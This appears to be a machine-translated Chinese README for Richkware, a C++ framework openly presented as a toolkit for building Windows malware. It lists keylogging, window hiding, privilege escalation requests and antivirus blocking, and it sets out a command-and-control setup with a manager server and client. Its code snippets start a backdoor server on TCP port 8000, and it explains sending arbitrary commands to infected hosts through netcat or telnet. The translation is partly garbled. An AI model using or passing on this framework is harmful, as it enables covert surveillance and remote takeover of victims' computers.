Richkware
1.0.0
构建Windows恶意软件的框架,用C ++编写。
Richkware是网络和操作系统功能的库,您可以用来创建恶意软件。这些功能的组成允许应用程序假设可引用以下恶意软件类型的行为:
Richkware-Manager-Server:用于管理主机的服务,其中存在使用Richkware Framework开发的恶意软件实例。
Richkware-Manager-client: Richkware-Manager-Server的客户端,它从服务器中获取了所有主机的列表,并且能够向他们发送任何类型的命令。
| en | 它 | |
|---|---|---|
| 推介会 | ||
| 报告 |
存储(存储。H ):
Isadmin和requestAdminPrivileges ( Richkware.h ):检查并要求管理员特权;
StealthWindow ( Richkware.h ):隐藏应用程序;
OpenApp ( Richkware.h ):打开任意应用程序;
KeyLogger ( Richkware.h ):将所有按键存储在文件中;
BlockApps E UnblockApps ( blockApps.h ):块和解密应用程序(Antivirus,...)。
这些是构建和使用Richkware的基本要求:
打开main.cpp,并创建一个Richkware实例。
如果您已经部署了RMS,则可以按以下方式初始化恶意软件:
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
它从Richkware-Manager-server获得了一个安全的密钥,并将密钥设置为加密密钥。 DefaultPass被用作临时加密密钥,以确保与RMS进行安全通信,如果恶意软件无法达到RMS获取其加密KET的RMS,则将使用DefaultPass作为加密密钥。
否则,如果您尚未部署RMS,则可以使用:
Richkware richkware("Richk","richktest");
这样,它将“ Richktest”用作加密密钥。
在main.cpp实现之后,您可以按以下方式进行编译。
make
在下面的示例中,我们称之为“服务器”,这是一种使用Richkware Framework开发的恶意软件,并在其中启用了创建服务器的功能,而恶意软件的创建者( Hacker )则试图与受感染的PC建立连接。
呼叫框架函数启动器在主机上,它在端口上启动服务器,在下面的示例中是TCP端口8000。请记住,如果另一个程序已经使用了端口,则不能使用该端口,直到程序停止为止。
int main () {
...
richkware.network.server.Start("8000");
...
}
在安装Java虚拟机的所有系统中,您都可以使用Richkware-Manager-Client,否则,如果不存在,则可以轻松使用终端。
在UNIX系统中,您可以使用NetCat ,并运行以下命令:
nc <serverName> 8000
如果服务器在开放端口上收到了请求并成功创建连接,则它对客户端确认连接的建立做出了响应,然后您可以编写:
[[1]]COMMAND
其中命令是必须在服务器运行的受感染主机上执行的命令。
在Windows中,您可以以相同的方式使用Telnet :
telnet <serverName> 8000
...
[[1]]COMMAND
